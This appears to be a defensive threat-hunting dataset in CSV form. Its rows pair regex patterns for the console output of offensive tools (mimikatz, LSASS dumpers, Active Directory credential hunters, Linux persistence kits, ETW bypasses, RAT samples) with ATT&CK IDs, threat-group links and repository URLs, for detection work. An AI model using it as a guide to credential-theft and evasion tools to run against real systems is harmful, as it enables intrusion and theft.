"*[+] XDG persistence established!*",".{0,1000}\[\+\]\sXDG\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13421"
"*[+] You spin my gato round right round ?*",".{0,1000}\[\+\]\sYou\sspin\smy\sgato\sround\sright\sround\s\?.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#content","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","13422"
"*[+] Your payload must be executed now !*",".{0,1000}\[\+\]\sYour\spayload\smust\sbe\sexecuted\snow\s!.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","#content","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","13423"
"*[+]ImpersonateLoggedOnUser() succeed!*",".{0,1000}\[\+\]ImpersonateLoggedOnUser\(\)\ssucceed!.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#content","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","13424"
"*[=] Dumping LSASS memory*",".{0,1000}\[\=\]\sDumping\sLSASS\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","13425"
"*[->] sending payload..as chuncks*",".{0,1000}\[\-\>\]\ssending\spayload\.\.as\schuncks.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#content","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","13426"
"*[ADA] Searching for accounts with msSFU30Password attribute*",".{0,1000}\[ADA\]\sSearching\sfor\saccounts\swith\smsSFU30Password\sattribute.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13427"
"*[ADA] Searching for accounts with userpassword attribute*",".{0,1000}\[ADA\]\sSearching\sfor\saccounts\swith\suserpassword\sattribute.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13428"
"*[Author:-Ege-Balc?-]*",".{0,1000}\[Author\:\-Ege\-Balc\?\-\].{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","13442"
"*[BAD R.A.T.]-Company CGI-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sCGI\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13443"
"*[BAD R.A.T.]-Company PHP(MySQL)-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sPHP\(MySQL\)\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13444"
"*[BAD R.A.T.]-Company PHP-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sPHP\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13445"
"*[bruteforce_mode]*",".{0,1000}\[bruteforce_mode\].{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#content","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","13446"
"*[c0d3d p0is0n].exe*",".{0,1000}\[c0d3d\sp0is0n\]\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13447"
"*[CamHacker]*",".{0,1000}\[CamHacker\].{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","13448"
"*[console]::WriteLine('Obfuscation Rocks!')*",".{0,1000}\[console\]\:\:WriteLine\(\'Obfuscation\sRocks!\'\).{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","13449"
"*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","13450"
"*[E] Unable to read LSA secrets.  Perhaps you are not SYTEM?*",".{0,1000}\[E\]\sUnable\sto\sread\sLSA\ssecrets\.\s\sPerhaps\syou\sare\snot\sSYTEM\?.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","13451"
"*[experimental] Extract keys from CAPI RSA/AES provider*",".{0,1000}\[experimental\]\sExtract\skeys\sfrom\sCAPI\sRSA\/AES\sprovider.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13452"
"*[experimental] Patch CNG service for easy export*",".{0,1000}\[experimental\]\sPatch\sCNG\sservice\sfor\seasy\sexport.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13453"
"*[experimental] Patch CryptoAPI layer for easy export*",".{0,1000}\[experimental\]\sPatch\sCryptoAPI\slayer\sfor\seasy\sexport.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13454"
"*[experimental] patch Events service to avoid new events*",".{0,1000}\[experimental\]\spatch\sEvents\sservice\sto\savoid\snew\sevents.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13455"
"*[experimental] patch Terminal Server service to allow multiples users*",".{0,1000}\[experimental\]\spatch\sTerminal\sServer\sservice\sto\sallow\smultiples\susers.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13456"
"*[experimental] Try to enumerate all modules with Detours-like hooks*",".{0,1000}\[experimental\]\sTry\sto\senumerate\sall\smodules\swith\sDetours\-like\shooks.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13457"
"*[experimental] try to get passwords from mstsc process*",".{0,1000}\[experimental\]\stry\sto\sget\spasswords\sfrom\smstsc\sprocess.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13458"
"*[experimental] try to get passwords from running sessions*",".{0,1000}\[experimental\]\stry\sto\sget\spasswords\sfrom\srunning\ssessions.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13459"
"*[Find-DomainShare] Enumerating server *",".{0,1000}\[Find\-DomainShare\]\sEnumerating\sserver\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","13460"
"*[Find-DomainUserLocation] Stealth enumeration *",".{0,1000}\[Find\-DomainUserLocation\]\sStealth\senumeration\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13461"
"*[Find-InterestingDomainShareFile] Enumerating server*",".{0,1000}\[Find\-InterestingDomainShareFile\]\sEnumerating\sserver.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13462"
"*[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for*",".{0,1000}\[Get\-DomainGPOUserLocalGroupMapping\]\sEnumerating\snested\sgroup\smemberships\sfor.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13465"
"*[GPP] Searching for passwords now*",".{0,1000}\[GPP\]\sSearching\sfor\spasswords\snow.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13466"
"*[i] [HELL HALL] Press <Enter> To Run ... *",".{0,1000}\[i\]\s\[HELL\sHALL\]\sPress\s\<Enter\>\sTo\sRun\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","13467"
"*[i] AAD Join:*enumerate*",".{0,1000}\[i\]\sAAD\sJoin\:.{0,1000}enumerate.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","13468"
"*[i] Argument Spoofed.*",".{0,1000}\[i\]\sArgument\sSpoofed\..{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","13469"
"*[i] Checking for insecure trustee/resource delegations*",".{0,1000}\[i\]\sChecking\sfor\sinsecure\strustee\/resource\sdelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13470"
"*[i] Credman:*Credential Blob Decrypted*",".{0,1000}\[i\]\sCredman\:.{0,1000}Credential\sBlob\sDecrypted.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","13471"
"*[i] Dumping LSASS Using *",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\s.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13472"
"*[i] Dumping LSASS Using comsvcs.dll*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\scomsvcs\.dll.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13473"
"*[i] Dumping LSASS Using ProcDump*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\sProcDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13474"
"*[i] Hooked Ntdll Base Address : *",".{0,1000}\[i\]\sHooked\sNtdll\sBase\sAddress\s\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13475"
"*[i] Parsing for Defender Exclusions*",".{0,1000}\[i\]\sParsing\sfor\sDefender\sExclusions.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","#content","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","13476"
"*[i] Running ADeleg and creating *",".{0,1000}\[i\]\sRunning\sADeleg\sand\screating\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13477"
"*[i] Sending Encrypted SAM Save*",".{0,1000}\[i\]\sSending\sEncrypted\sSAM\sSave.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13478"
"*[i] Unhooked Ntdll Base Address: *",".{0,1000}\[i\]\sUnhooked\sNtdll\sBase\sAddress\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13479"
